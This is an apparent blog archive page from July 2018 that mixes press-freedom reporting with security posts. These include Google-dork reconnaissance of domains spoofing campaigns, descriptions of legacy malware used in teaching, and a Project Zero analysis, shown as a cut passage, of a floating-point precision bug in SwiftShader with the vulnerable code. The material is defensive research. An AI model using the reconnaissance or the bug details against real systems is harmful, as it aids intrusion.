Monthly Archives: July 2018

Police are threatening free expression by abusing the law to punish disrespect of law enforcement

Spencer Gallien

In May 2016, a pair of police officers with the New York City Police Department ticketed Shyam Patel for his car’s tinted windows in Times Square. After parking his car, Patel raised his middle finger at them in response.

The NYPD officers then approached Patel and asked for his identification. When Patel asked what crime he was suspected of committing, he alleges that one officer told him, “You cannot gesture as such…”

When Patel insisted that freedom of speech did grant him the right, Patel alleges that the officer said that he could not curse at a police officer, grabbed his phone, and again demanded identification. Patel was arrested and charged with disorderly conduct and resisting arrest.

While the charges were later dropped, Patel is suing the officers for violation of his First Amendment right to free expression. No law prohibits swearing at or flipping off a police officer, and it seems clear that law enforcement were in the wrong. But Patel’s case is only the latest incident of police officers abusing the law and their positions of power to punish people critical or disrespectful of law enforcement.

In 2009, a black man returned to his home in Cambridge, Massachusetts from travels abroad to find his door tightly shut. He, along with his taxi driver, forced the door open. Soon after, police arrived at his residence to respond to a reported burglary.

It’s unclear what words exactly were exchanged, but the man was arrested for “loud and tumultuous behavior”. A report by the officer in question indicated that the man merely used harsh language and called the officer a racist.

If the circumstances were different, this incident may not have made the headlines it did—countless people of color are accused of criminal activity for walking on their own sidewalks or entering their own homes. But the man was Henry Louis Gates, Jr., a professor at Harvard University and friend of newly elected President Obama. The details of his arrest quickly made waves across the country.

Coverage of the incident focused on concerns of racial profiling, but it was about free speech, too. Gates was arrested not for breaking and entering, but for disorderly conduct after he used harsh language at the officer—just like Patel in New York. Civil liberties attorney Harvey Silverglate has called disorderly conduct law enforcement’s “charge of choice” for when a citizen gives lip to a cop.

These types of cases are still a regular occurrence, despite the landmark 1974 case Lewis v. City of New Orleans, in which the Supreme Court struck down a city ordinance that outlawed “obscene or opprobrious language toward or with reference to” a police officer. At the time, the court noted that a “properly trained police officer may reasonably be expected to exercise a higher degree of restraint” than private citizens.

Despite the Supreme Court’s clear ruling on this issue, police in Pennsylvania are using the state’s version of a “hate crime” law to prosecute multiple people who say offensive things to them when they are arrested. These laws are intended to protect the vulnerable, but are instead being wielded as a tool by powerful government entities.

Robbie Sanderson, a 52-year-old black man, was arrested for retail theft near Pittsburgh in September 2016. During his arrest, he called the police “Nazis” and “skinheads”, and said that “all you cops just shoot people for no reason.” He was charged with felony ethnic intimidation.

Later that year, Senatta Amoroso became agitated at a police station, and was arrested for disorderly conduct and knocked to the ground. According to the ACLU, she yelled while handcuffed in a jail cell: “Death to all you white bitches. I’m going to kill all you white bitches. I hope ISIS kills all you white bitches.” Her six charges included a felony assault charge for hitting an officer in the arm and felony ethnic intimidation.

Sanderson’s and Amoroso’s cases are just two of many in which Pennsylvania law enforcement agents have slapped disrespectful arrestees with “hate crime” charges. These people yelled speech that officers found offensive, but they were handcuffed and posed no physical threat to anyone.

Pennsylvania’s “ethnic intimidation” charge works similarly to “hate crime” laws in other states, which generally enhance penalties for perpetrators when victims were targeted for discriminatory reasons. (“Hate speech” laws technically do not exist in the United States.) Although hate crime statutes were enacted to protect minorities, they can be, and are being, enforced to protect powerful groups like police.

Nadine Strossen, a professor at New York Law School who was previously president of the ACLU, is not surprised that police are abusing “hate crime” laws to punish disrespect. She thinks these cases, in New York, Massachusetts, and Pennsylvania, all show the same pattern of such laws being wielded against the people they were intended to protect—minorities, and people who lack political power.

She noted that during the civil rights movement, police would charge people protesting injustice with whatever they could—with “resisting arrest”, “disorderly conduct”, or “fighting words”, all of which Strossen calls “catch-all” crimes.

Strossen thinks that the way police abuse “hate crime” laws reveals the inherently problematic nature of legislation that attempts to single out specific identities. “There’s this hydrologic pressure once you have any hate crime or hate speech law. Additional pressures to expand this definition emerge, until the question becomes: ‘Who is not included?’”

In Strossen’s new book, HATE: Why We Should Resist It with Free Speech, not Censorship, she argues that hate speech laws in many European countries have ended up stifling the speech of the vulnerable populations they are intended to protect. She cautions that these recent examples show how hate crime laws can potentially be used for similar purposes in the United States, and that pushing for hate speech laws can backfire.

While the first hate crime laws in the United States covered only race and religion, they have expanded to include other categories like gender and sexual orientation. There is concern that powerful groups like police officers are co-opting these laws to shield themselves from scrutiny or criticism. It’s a pattern not unique to the United States—she referenced a recent proposal in South Africa that considered adding “occupation” to a list of protected classes. “Could this include police and politicians, and government officials?”

Some U.S. policymakers are already aiming to officially establish police as a “protected” class of people. This May, the House of Representatives passed the Protect and Serve Act, which would make assaulting a police officer a federal crime. The Senate’s version of this bill even frames attacks on police as federal hate crimes.

These legislative efforts at the federal level follow on the heels of so-called “Blue Lives Matter” bills already passed in states including Kentucky and Louisiana. And while the federal bill applies to physical attacks on police, the state-level laws have been enforced against mere language hostile to police.

During an arrest on unrelated charges in 2016, a man in New Orleans yelled insults at officers and was slapped with additional charges. In a post about this incident, the ACLU of Louisiana wrote that “While racist, sexist, and other similar language may show a lack of respect for law enforcement, it is the job of the police to protect even the rights of those whose opinions they don’t share.”

These bills are not only unnecessary (attacking police officers is already a crime) but also actively harmful.

“The point is clear, especially with regards to the adoption of hate crime statute frameworks: to reinforce the myth of the police as vulnerable and embattled,” Natasha Lennard wrote about “the Protect and Serve Act” for The Intercept.

Recent incidents in Pennsylvania, New York, and Louisiana are part of a long and disturbing history of police abusing the law to punish speech they find unfavorable. It’s deeply concerning for free expression that police feel empowered to add additional charges to arrestees because of the words that they yell while being handcuffed, and legislation that makes police a protected class only amplifies the police’s ability to silence dissent and intimidate critics.

The 2018 Cloud Security Guide: Platforms, Threats, and Solutions

Cloud security is a pivotal concern for any modern business. Learn how the cloud works and the biggest threats to your cloud software and network.



How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28 A.K.A. “Fancy Bear” according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details.

And many of the subsequent (non-technical) articles that have been published have focused almost exclusively on the fact that McCaskill is running for re-election in 2018. But is it really conclusive that this hacking attempt was about the 2018 midterms? After all, Senator McCaskill is the top-ranking Democrat on the Homeland Security & Governmental Affairs Committee and also sits on the Armed Services Committee. Perhaps she and her staffers were instead targeted for insights into ongoing Senate investigations?

Senator Claire McCaskill's Committee Assignments

Because if you want to target an election campaign, you should target the candidate’s campaign server, not their government accounts. (Elected officials cannot use government accounts/resources for their personal campaigns.) In the case of Senator McCaskill, the campaign server is:

Which appears to be a WordPress site.

Running on an Apache server. Apache error log

And it has various e-mail addresses associated with it. email addresses

That looks interesting, right? So… let’s do some Google dorking!

Searching for “” in URLs while discarding the actual site yielded a few pages of results.
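To make the shape of that query concrete (using a hypothetical domain, example-campaign.com, since the actual domain is withheld above), a dork like this surfaces pages whose URLs mention a domain while excluding results hosted on the site itself:

```
inurl:"example-campaign.com" -site:example-campaign.com
```

Anything matching the `inurl:` term that isn’t the legitimate site is a candidate for closer inspection.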

Google dork:

And on page two of those results, this…

Definitely suspicious.

What is it? It’s a domain on the .de TLD (not a TLD itself).

Okay, so… what other interesting domains associated with are there to discover?

How about additional US Senators up for re-election such as Florida Senator Bill Nelson? Yep.

Senator Bob Casey? Yep.

And Senator Sheldon Whitehouse? Yep.

But that’s not all. Democrats aren’t the only ones being spoofed.

Iowa Senate Republicans.

And “Senate Conservatives”.

Hmm. Well, while we are no closer to knowing whether or not Senator McCaskill’s government accounts were actually targeted because of the midterm elections – the domains shown above are definitely shady AF. And enough to give cause for concern that the 2018 midterms are indeed being targeted, by somebody.

(Our research continues.)

Meanwhile, the FBI might want to get in touch with the owners of

Google intends to make GCP the most secure cloud platform

I attended my first Google Next conference last week in San Francisco and came away quite impressed. Clearly, Google is throwing more and more of its engineering prowess and financial resources at its Google Cloud Platform (GCP) to grab a share of enterprise cloud computing dough, and it plans to differentiate itself based upon comprehensive enterprise-class cybersecurity features and functionality.

Google Cloud CEO Diane Greene started her keynote by saying Google intends to lead the cloud computing market in two areas – AI and security. Greene declared that AI and security represent the “#1 worry for customers and the #1 opportunity for GCP.” 

Did ICE detain this Mexican journalist for criticizing U.S. immigration policy?

Gutiérrez and Oscar after release

Emilio Gutiérrez-Soto and his son Oscar speak to the press after being released from an ICE detention facility in El Paso, Texas, on July 26, 2018.

Texas Tribune/Julian Aguilar

Late last night, Mexican journalist Emilio Gutiérrez-Soto and his son Oscar were released from an Immigration and Customs Enforcement (ICE) detention facility in El Paso, Texas. The two had been held in ICE detention for more than seven months, ever since being arrested and nearly deported by ICE agents on December 7, 2017.

The United States government has never offered a convincing reason for arresting Gutiérrez and Oscar in December, or for continuing to detain the two. Gutiérrez and his attorneys have argued that ICE targeted him for arrest in retaliation for his criticism of U.S. immigration policy, in violation of his First Amendment rights — and they have internal ICE documents to back up their case. Freedom of the Press Foundation has obtained the documents and is publishing them for the first time.

This is Gutiérrez’s harrowing story.

"Good morning,” the email began. “Attached is a list of 2,718 non-detained cases that may be candidates for arrest.”

It was early morning on February 1, 2017, just a few days after President Donald Trump’s inauguration, when an ICE supervisory detention and deportation officer sent that email to other agents in ICE’s El Paso field office. The email carried the subject line, “Non-Detained Target List.” A spreadsheet named “ND Target List.xls” was attached to the email.

An assistant field director in ICE’s El Paso office replied on February 13.

“When u get back, forward this list to the National Criminal Analysis and Targeting Center (NCATC) this is the only FOSC [Fugitive Operations Support Center]. They will run this list and provide info on address location etc …”

One of the many names on the targeting list was “GUTIERREZ SOTO, EMILIO.”

The reason that Gutiérrez was included on that list is a mystery.

Screenshot of ICE emails

Eduardo Beckett, one of Gutiérrez’s attorneys, told Freedom of the Press Foundation that there was no “legitimate law enforcement reason” for Gutiérrez to be on an ICE target list.

“It’s fugitive operations,” he said of the targeting list. “It’s people with felonies. Emilio doesn’t fit that mold.”

Gutiérrez is not a fugitive, and he has no criminal record. He is a Mexican journalist who legally applied for asylum in the United States in 2008, after being threatened by elements of the Mexican military.

So why did ICE target him for possible arrest? Beckett believes it was because Gutiérrez had criticized U.S. immigration policy.

“The only reason he was on that list was because he was a journalist who criticized ICE and the Mexican government,” he said.

Gutiérrez and his son Oscar entered the United States on June 16, 2008.

ICE’s official “Record of Deportable / Inadmissible Alien” for Gutiérrez states that he and Oscar appeared at the Antelope Wells Border Crossing station in New Mexico and formally requested asylum. Gutiérrez was taken to an official “port of entry” — one of the sites where immigrants may legally apply for asylum — and interviewed by a Customs and Border Protection officer. 

Gutiérrez told the CBP officer that Mexican military police officers had threatened his life after he reported on corruption in the Mexican military.

“The subject continued to state that on May 5, 2008 at approximately midnight several armed military police wearing masks and armed with high caliber weapons entered his house without his permission claiming to look for drugs and weapons,” the ICE record of Gutiérrez’s CBP interview states. “Subject Gutierrez further states that on Saturday June 14, 2008 he was warned by a female friend who claims she overheard military police officers making plans to harm the subject.”

Gutiérrez said that he feared that his life would be in danger if he had to return to Mexico, so ICE gave him a form to fill out and sent him to the El Paso processing center in Texas. His son Oscar, who was still a minor at the time, was detained in a separate facility. In El Paso, Gutiérrez was interviewed by an asylum officer, who assessed that he had a “credible fear” of returning to Mexico, and he was placed into asylum proceedings. He was detained in the El Paso detention center for seven months before being released on parole. He and Oscar, who had been released to family friends in the U.S., reunited and moved to Las Cruces, New Mexico.

Years passed without any ruling on their asylum claim, and Gutiérrez and Oscar settled into their new life in New Mexico. Gutiérrez bought a food truck. Though he had not worked as a journalist since fleeing Mexico, he was happy to speak to the press, and he did not hesitate to criticize the United States’ broken asylum system.

“We are talking about an immigration judge and an immigration attorney whose job it is … to keep from expanding the abundance of people looking for protection because of the violence in Mexico,” he told the AP in January 2011, after attending a hearing in his asylum case. “We don’t have a country that accepts us with its laws and regulations even after being aware that we fled Mexico because the Mexican state was persecuting us.”

“We are here because we want to save our lives and it just seems so unfair because a country of freedom and human rights … is ignoring us,” he told the AP a month later, after a ruling on his asylum case was delayed. “We were looking for refuge and they put us in prison.”

In July 2017, immigration judge Robert Hough finally ruled on his nine-year-old asylum claim. Hough ruled that Gutiérrez did not present sufficient evidence to prove that he was targeted for his journalistic work or that his life would be in danger if he returned to Mexico. (According to the Committee to Protect Journalists, more than 60 journalists have been killed in Mexico since June 2008, when Gutiérrez fled to the United States and applied for asylum.)

Hough seemed unconvinced that Gutiérrez was really a journalist, in part because Gutiérrez had trouble finding copies of his published newspaper clips to show the judge. Hough denied the asylum claim and ruled that Gutiérrez could be removed from the United States.

“He simply dismissed all the arguments, put them in the trash can and denied the asylum,” Gutiérrez said in an interview with the Knight Center for Journalism in the Americas. “I feel very sad and I am very disappointed in the immigration authorities, especially the policies that the United States exercises.”

On October 4, 2017, Gutiérrez accepted the National Press Club’s prestigious John Aubuchon award on behalf of all Mexican journalists. During his acceptance speech at the club’s black-tie awards gala in Washington, D.C., Gutiérrez accused the U.S. government of hypocrisy for advocating for human rights abroad while denying them at home. Gutiérrez was particularly critical of the United States’ asylum policies.

“Those who seek political asylum in countries like the U.S. encounter the decisions of immigration authorities that barter away international laws,” he said.

As Gutiérrez was publicizing the plight of Mexican journalists and asylum seekers, his legal team tried to get the immigration judge’s decision denying him asylum reversed. They appealed to the Board of Immigration Appeals (BIA), which has the power to review immigration court decisions. But on November 2, 2017, the BIA rejected the appeal because it had been filed late. On November 20, Gutiérrez’s attorney Eduardo Beckett asked the court to reopen the appeal.

If the BIA reopened the appeal, then Gutiérrez would be safe. He could not be removed from the country while the appeal was pending. But until the court granted his petition to reopen the appeal, Gutiérrez was at the mercy of ICE. He had to ask the agency to grant him a stay of deportation.

Under the Kafkaesque U.S. immigration law system, ICE officials have the power to issue stays of removal, which prevent the agency from deporting someone. If ICE refuses to issue a stay, then the BIA has an opportunity to step in and issue an emergency stay, which prevents ICE from deporting the person. Crucially, though, the BIA does not have the power to issue an emergency stay until after ICE has already refused to issue a stay and taken someone into custody.

Beckett expected that ICE would officially deny the stay on December 7, when Gutiérrez and his son were scheduled to appear at ICE’s El Paso field office for a routine check-in. He knew that once ICE denied the stay, he could call the BIA and request an emergency stay. Then the BIA would either deny the stay and allow ICE to deport Gutiérrez, or it would grant the stay and order ICE not to deport him.

For assistance in dealing with ICE, Gutiérrez’s legal team reached out to members of Congress. Senator Patrick Leahy of Vermont took a particular interest in the case, and his senate office got in touch with ICE’s congressional liaison to ask about the case.

On November 20, a Leahy aide emailed Gutiérrez’s legal team and said ICE’s congressional liaison had assured her that ICE would “likely make their decision after consulting with BIA.”

Beckett said that ICE told him something similar.

“I had assurances from ICE that they would not try to deport him,” he said. “They told me to bring Emilio and Oscar in and if the stay by ICE was not granted, then ICE would get a ruling from the BIA before taking any action.”

“That was a lie,” he added. “That to me shows the bad faith.”

When Beckett, Gutiérrez, and Oscar arrived at ICE’s El Paso field office on December 7, ICE agents arrested Gutiérrez and Oscar immediately after informing them that they had decided not to grant a stay.

Beckett called the BIA to petition for an emergency stay of removal, and the court told Beckett that it would call him back as soon as it had ruled on his petition. But ICE had no intention of waiting for the court’s ruling. Agents handcuffed Gutiérrez and Oscar, put the two of them in a car, and started driving toward the border.

As ICE raced to deliver Gutiérrez and Oscar to the border, Gutiérrez’s legal team sent an urgent email to Leahy’s office: “ICE did not wait for the BIA decision. He is being escorted to the bridge. Could you all make a call to please try and stop this? The court has not ruled.”

A Leahy aide wrote back that the senator’s office could not stop ICE: “I am so very sorry to hear this!! There is really nothing else that our office can do to intervene or prevent this.”

According to Beckett, Gutiérrez and Oscar were driven to a parking lot outside of a Border Patrol station, where Gutiérrez was told that Mexican immigration agents were on their way to pick them up and take them back to Mexico.

Before Gutiérrez could be handed over to the Mexican government, the BIA called Beckett back with good news — Gutiérrez and Oscar had been granted an emergency stay of deportation. Beckett immediately called ICE and told them to bring Gutiérrez and Oscar back. The agency refused. The BIA’s emergency order might have prevented ICE from deporting Gutiérrez and his son, but it did not prevent the agency from detaining them.

ICE agents took Gutiérrez and Oscar to an immigration detention facility. They would remain in ICE detention for nearly eight months, and Gutiérrez’s food truck would be stolen while he was still detained.

Gutiérrez’s asylum appeal slowly worked its way through the courts. On December 22, 2017, the BIA decided to reopen Gutiérrez’s appeal. On May 15, 2018, it granted his appeal and remanded his asylum case back to immigration judge Robert Hough, with instructions to consider new evidence and then issue a new decision.

By that time, Gutiérrez’s attorneys were pursuing a new legal strategy.

On March 5, 2018, Gutiérrez filed a petition for habeas corpus in the Western District of Texas federal district court. Habeas corpus — one of the oldest and most fundamental rights in the United States — is the right not to be detained arbitrarily.

Gutiérrez’s habeas corpus petition, which was prepared by Rutgers University’s Institute of International Human Rights law clinic, argued that his ongoing detention by ICE was unconstitutional. The habeas petition advanced a number of arguments for why ICE’s detention of Gutiérrez was unlawful, but the most interesting was the claim that it violated his First Amendment rights to free speech and freedom of the press. Gutiérrez argued that ICE had targeted him for detention because he had publicly criticized the agency in his capacity as a journalist.

As evidence, Gutiérrez’s attorneys noted that Gutiérrez had been arrested by ICE just weeks after publicly criticizing U.S. immigration authorities at the National Press Club awards dinner. They also cited the fact that an ICE official reportedly told National Press Club president Bill McCarren to “tone it down” when it came to advocating for Gutiérrez’s case. (ICE has denied saying this.)

Later, Gutiérrez's legal team found their key piece of evidence — the internal ICE emails from February 2017.

On April 30, 2018, National Press Club press freedom fellow Kathy Kiely received copies of the ICE emails in response to a Freedom of Information Act request. She passed them on to Gutiérrez’s legal team, who immediately recognized their significance.

“When Kathy did her FOIA, I told her, this is gold,” Beckett said. “This shows that there was secret emails, a target list, and this was done months before he lost his asylum claim.”

Federal district judge David Guaderrama agreed, citing the ICE emails in his order denying the government’s motion to dismiss the habeas corpus case.

“Respondents [ICE] contend that they detained Petitioners [Gutierrez-Soto and his son] based on a warrant issued after the removal order issued by the immigration judge became final in August 2017,” Guaderrama wrote in a July 10 decision. “However, the emails between ICE officials undermine Respondents’ argument. The emails show that ICE officials were already targeting Mr. Gutierrez-Soto in February 2017. … This is significant because it is before the immigration judge issued the removal order in July 2017, which became final in August 2017.”

Guaderrama concluded that there was sufficient evidence to suggest that “Respondents retaliated against [Petitioners] for asserting their free press rights … [and] Respondents’ reason for detaining Petitioners is a pretext.”

Guaderrama ordered the government to bring Gutiérrez and Oscar to an evidentiary hearing on August 1, 2018, so that he could hear Gutiérrez’s testimony and the government’s defense of his continued detention, and then rule on Gutiérrez’s habeas corpus petition. Guaderrama also denied the government’s motion to delay the hearing and ordered the government to provide Gutiérrez’s legal team with more information about the ICE email thread and the targeting list.

Rather than try to defend ICE’s detention of Gutiérrez and Oscar at a federal court hearing, the government opted to release the two of them.

Beckett credited the federal court with forcing the government’s hand.

“The release of Emilio and his son Oscar is a testament that our Federal Courts protect our Constitutional rights,” he said in a statement. “The Constitution is not just an abstract written document but the cornerstone of our liberty and democracy.”

Now that Gutiérrez is free, he plans to move to Michigan. On May 2, 2018, the University of Michigan awarded him a Knight-Wallace fellowship. The one-year fellowship covers full tuition and health benefits, and includes a $75,000 stipend. Perhaps most importantly, the fellowship will allow Gutiérrez to work alongside other journalists for the first time since he fled Mexico in 2008.

Gutiérrez’s asylum case — which is entirely separate from his habeas corpus case — remains unresolved. In May 2018, the BIA remanded the case back to Hough, the immigration judge who previously denied Gutiérrez’s asylum claim, with instructions to rule on it again after considering new evidence.

Once Gutiérrez moves to Michigan for the Knight-Wallace fellowship, it’s possible that his asylum case will be transferred from Hough, who is based in Texas, to an immigration judge in Michigan. Either way, Gutiérrez’s fate will once again be in the hands of an immigration judge.

If he is denied asylum for a second time, he can try to appeal (again) to the BIA. If the BIA refuses the appeal, ICE will finally be free to deport him and his son.

But if Gutiérrez is granted asylum, then his long ordeal will finally be over, and he will be able to live in the U.S. without fear of being detained or deported by ICE.

Some changes in how libpcap works you should know

I thought I'd document the solution to this problem I had.

The API libpcap is the standard cross-platform way of sniffing packets off the network. It works on Windows (winpcap), macOS, and all the Unixes. It's better than simply opening a "raw socket" on Unix platforms because it takes advantage of higher performance capabilities of the system, including specialized sniffing hardware.

Traditionally, you'd open an adapter with pcap_open(), whose function parameters set options like snap length, promiscuous mode, and timeouts.

However, in newer versions of the API, what you should do instead is call pcap_create(), then set the options individually with calls to functions like pcap_set_timeout(), then once you are ready to start capturing, call pcap_activate().

I mention this in relation to "TPACKET" and pcap_set_immediate_mode().

Over the years, Linux has been adding a "ring buffer" mode to packet capture. This is a trick where a packet buffer is memory mapped between user-space and kernel-space. It allows a packet-sniffer to pull packets out of the driver without the overhead of extra copies or system calls that cause a user-kernel space transition. This has gone through several generations.

One of the latest generations causes the pcap_next() function to wait forever for a packet. This happens a lot on virtual machines where there is no background traffic on the network.

This looks like a bug, but maybe it isn't. It's unclear what the "timeout" parameter actually means. I've been hunting down the documentation, and curiously, it's not really described anywhere. For such an ancient, popular API, libpcap is almost entirely undocumented as to what it precisely does. I've tried reading some of the code, but I'm not sure I've come to any understanding.

In any case, the way to resolve this is to call the function pcap_set_immediate_mode(). This causes libpcap to back off and use an older version of TPACKET, so that things work as expected: even on silent networks, the pcap_next() function will time out and return.

I mention this because I fixed this bug in my code. When running inside a VM, my program would never exit. I changed from pcap_open_live() to the pcap_create()/pcap_activate() method instead, adding a call to pcap_set_immediate_mode(), and now things work. Performance seems roughly the same as far as I can tell.

I'm still not certain what's going on here, and there are even newer proposed zero-copy/ring-buffer modes being added to the Linux kernel, so this can change in the future. But in any case, I thought I'd document this in a blogpost in order to help out others who might be encountering the same problem.

Retired Malware Samples: Everything Old is New Again

I’m always on the quest for real-world malware samples that help educate professionals how to analyze malicious software. As techniques and technologies change, I introduce new specimens and retire old ones from the reverse-engineering course I teach at SANS Institute.  Here are some of the legacy samples that were once present in FOR610 materials. Though these malicious programs might not appear relevant anymore, aspects of their functionality are present even in modern malware.

A Backdoor with a Backdoor

To learn fundamental aspects of code-based and behavioral malware analysis, the FOR610 course examined Slackbot at one point. It was an IRC-based backdoor, which its author “slim” distributed as a compiled Windows executable without source code.

Dated April 18, 2000, Slackbot came with a builder that allowed its user to customize the name of the IRC server and channel it would use for Command and Control (C2). Slackbot documentation explained how the remote attacker could interact with the infected system over their designated channel and included this taunting note:

“don’t bother me about this, if you can’t figure out how to use it, you probably shouldn’t be using a computer. have fun. –slim”

Those who reverse-engineered this sample discovered that it had undocumented functionality. In addition to connecting to the user-specified C2 server, the specimen also reached out to a hardcoded server that “slim” controlled. The #penix channel gave “slim” the ability to take over all the botnets that his or her “customers” were building for themselves.

It turned out this backdoor had a backdoor! Not surprisingly, backdoors continue to be present in today’s “hacking” tools. For example, I came across a DarkComet RAT builder that was surreptitiously bundled with a DarkComet backdoor of its own.

You Are an Idiot

The FOR610 course used an example of a simple malevolent web page to introduce the techniques for examining potentially-malicious websites. The page, captured below, was a nuisance that insulted its visitors with the following message:

When the visitor attempted to navigate away from the offending site, its JavaScript popped up new instances of the page, making it very difficult to leave. Moreover, each instance of the page played the following jingle on the victim’s speakers. “You are an idiot,” the song exclaimed. “Ahahahahaha-hahahaha!” The cacophony of multiple windows blasting this jingle was overwhelming.


A while later I came across a network worm that played this sound file on victims’ computers, though I cannot find that sample anymore. While writing this post, I was surprised to discover a version of this page, sans the multi-window JavaScript trap, still residing online. Maybe it’s true what they say: a good joke never gets old.

Clipboard Manipulation

When Flash reigned supreme among banner ad technologies, the FOR610 course covered several examples of such forms of malware. One of the Flash programs we analyzed was a malicious version of the ad pictured below:

At one point, visitors to legitimate websites, such as MSNBC, were reporting that their clipboards appeared “hijacked” when the browser displayed this ad. The advertisement, implemented as a Flash program, was using the ActionScript setClipboard function to replace victims’ clipboard contents with a malicious URL.

The attacker must have expected the victims to blindly paste the URL into messages without looking at what they were sharing. I remembered this sample when reading about a more recent example of malware that replaced Bitcoin addresses stored in the clipboard with the attacker’s own Bitcoin address for payments.

As malware evolves, so do our analysis approaches, and so do the exercises we use in the FOR610 malware analysis course.  It’s fun to reflect upon the samples that at some point were present in the materials. After all, I’ve been covering this topic at SANS Institute since 2001. It’s also interesting to notice that, despite the evolution of the threat landscape, many of the same objectives and tricks persist in today’s malware world.

REVIEW: Best VPN routers for small business

When selecting VPN routers, small businesses want ones that support the VPN protocols they desire as well as ones that fit their budgets, are easy to use and have good documentation.

We looked at five different models from five different vendors: Cisco, D-Link, DrayTek, Mikrotik and ZyXEL. Our evaluation called for setting up each unit and weighing the relative merits of their price, features and user-friendliness.

Below is a quick summary of the results:


Threat Modeling Thursday: 2018

Since I wrote my book on the topic, people have been asking me “what’s new in threat modeling?” My Blackhat talk is my answer to that question, and it’s been taking up the time that I’d otherwise be devoting to the series.

As I’ve been practicing my talk*, I discovered that there’s more new than I thought, and I may not be able to fit in everything I want to talk about in 50 minutes. But it’s coming together nicely.

The current core outline is:

  • What are we working on
    • The fast moving world of cyber
    • The agile world
    • Models are scary
  • What can go wrong? Threats evolve!
    • STRIDE
    • Machine Learning
    • Conflict

And of course, because it’s 2018, there are cat videos and emoji to augment logic. Yeah, that’s the word. Augment.

Wednesday, August 8 at 2:40 PM.

* Oh, and note to anyone speaking anywhere, and especially large events like Blackhat — as the speaker resources say: practice, practice, practice.

Also, something about the stylesheet for this blog breaks emoji.

Drawing Outside the Box: Precision Issues in Graphic Libraries

By Mark Brand and Ivan Fratric, Google Project Zero

In this blog post, we are going to write about a seldom seen vulnerability class that typically affects graphic libraries (though it can also occur in other types of software). The root cause of such issues is using limited precision arithmetic in cases where a precision error would invalidate security assumptions made by the application.

While other classes of bugs, notably integer overflows, could also be called precision issues, the major difference is this: with integer overflows, we are dealing with arithmetic operations where the magnitude of the result is too large to be accurately represented in the given precision. With the issues described in this blog post, we are dealing with arithmetic operations where the magnitude of the result, or a part of the result, is too small to be accurately represented in the given precision.

These issues can occur when using floating-point arithmetic in operations where the result is security-sensitive, but, as we’ll demonstrate later, can also occur in integer arithmetic in some cases.

Let’s look at a trivial example:

 float a = 100000000;
 float b = 1;
 float c = a + b;

If we were making the computation with arbitrary precision, the result would be 100000001. However, since float typically only allows for 24 bits of precision, the result is actually going to be 100000000. If an application makes the normally reasonable assumption that a > 0 and b > 0 implies that a + b > a, then this could lead to issues.

In the example above, the difference between a and b is so significant that b completely vanishes in the result of the calculation, but precision errors also happen if the difference is smaller, for example

 float a = 1000;
 float b = 1.1111111;
 float c = a + b;

The result of the above computation is going to be 1001.111084 and not 1001.1111111, which would be the accurate result. Here, only a part of b is lost, but even such results can sometimes have interesting consequences.

While we used the float type in the above examples, and in these particular examples using double would result in more accurate computation, similar precision errors can happen with double as well.

In the remainder of this blog post, we are going to show several examples of precision issues with security impact. These issues were independently explored by two Project Zero members: Mark Brand, who looked at SwiftShader, a software OpenGL implementation used in Chrome, and Ivan Fratric, who looked at the Skia graphics library, used in Chrome and Firefox.


SwiftShader is “a high-performance CPU-based implementation of the OpenGL ES and Direct3D 9 graphics APIs”. It’s used in Chrome on all platforms as a fallback rendering option to work around limitations in graphics hardware or drivers, allowing universal use of WebGL and other advanced JavaScript rendering APIs on a far wider range of devices.

The code in SwiftShader needs to handle emulating a wide range of operations that would normally be performed by the GPU. One operation that we commonly think of as essentially “free” on a GPU is upscaling, or drawing from a small source texture to a larger area, for example on the screen. This requires computing memory indexes using non-integer values, which is where the vulnerability occurs.

As noted in the original bug report, the code that we’ll look at here is not quite the code which is actually run in practice - SwiftShader uses an LLVM-based JIT engine to optimize performance-critical code at runtime, but that code is more difficult to understand than their fallback implementation, and both contain the same bug, so we’ll discuss the fallback code. This code is the copy-loop used to copy pixels from one surface to another during rendering:

 source->lockInternal((int)sRect.x0, (int)sRect.y0, sRect.slice, sw::LOCK_READONLY, sw::PUBLIC);
 dest->lockInternal(dRect.x0, dRect.y0, dRect.slice, sw::LOCK_WRITEONLY, sw::PUBLIC);

 float w = sRect.width() / dRect.width();
 float h = sRect.height() / dRect.height();

 const float xStart = sRect.x0 + 0.5f * w;
 float y = sRect.y0 + 0.5f * h;
 float x = xStart;

 for(int j = dRect.y0; j < dRect.y1; j++)
 {
   x = xStart;

   for(int i = dRect.x0; i < dRect.x1; i++)
   {
     // FIXME: Support RGBA mask
     dest->copyInternal(source, i, j, x, y, options.filter);

     x += w;
   }

   y += h;
 }


So - what highlights this code as problematic? We know prior to entering this function that all the bounds-checking has already been performed, and that any call to copyInternal with (i, j) in dRect and (x, y) in sRect will be safe.

The examples in the introduction above show cases where the resulting precision error means that a rounding-down occurs - in this case that wouldn’t be enough to produce an interesting security bug. Can we cause floating-point imprecision to result in a larger-than-correct value, leading to (x, y) values that are larger than expected?

If we look at the code, the intention of the developers is to compute the following:

 for(int j = dRect.y0; j < dRect.y1; j++)
 {
   for(int i = dRect.x0; i < dRect.x1; i++)
   {
     x = xStart + (i * w);
     y = yStart + (j * h);
     dest->copyInternal(source, i, j, x, y, options.filter);
   }
 }

If this approach had been used instead, we’d still have precision errors - but without the iterative calculation, there’d be no propagation of the error, and we could expect the eventual magnitude of the precision error to be stable, and in direct proportion to the size of the operands. With the iterative calculation as performed in the code, the errors start to propagate/snowball into a larger and larger error.

There are ways to estimate the maximum error in floating-point calculations, and if you really, really need to avoid having extra bounds checks, using this kind of approach and making sure that you have conservative safety margins around those maximum errors might work; but it would be a complicated and error-prone way to solve this issue. It’s also not a great approach for identifying the pathological values that we want here to demonstrate a vulnerability, so instead we’ll take a brute-force approach.

Intuitively, we’re fairly sure that the multiplicative implementation will be roughly correct, and that the implementation with iterative addition will be much less correct. Given that the space of possible inputs is small (Chrome disallows textures with width or height greater than 8192), we can just run a brute force over all ratios of source width to destination width, comparing the two algorithms, and seeing where the results are most different. (Note that SwiftShader also limits us to even numbers.) This leads us to the values of 5828, 8132; and if we compare the computations in this case (left side is the iterative addition, right side is the multiplication):

0:    1.075012 1.075012
1:    1.791687 1.791687
1000: 717.749878 717.749878   Up to here (at the precision shown) the values are still identical
1001: 718.466553 718.466553
2046: 1467.391724 1467.391724 At this point, the first significant errors start to occur, but note
2047: 1468.108398 1468.108521 that the "incorrect" result is smaller than the more precise one.
2856: 2047.898315 2047.898438
2857: 2048.614990 2048.614990 Here our two computations coincide again, briefly, and from here onwards
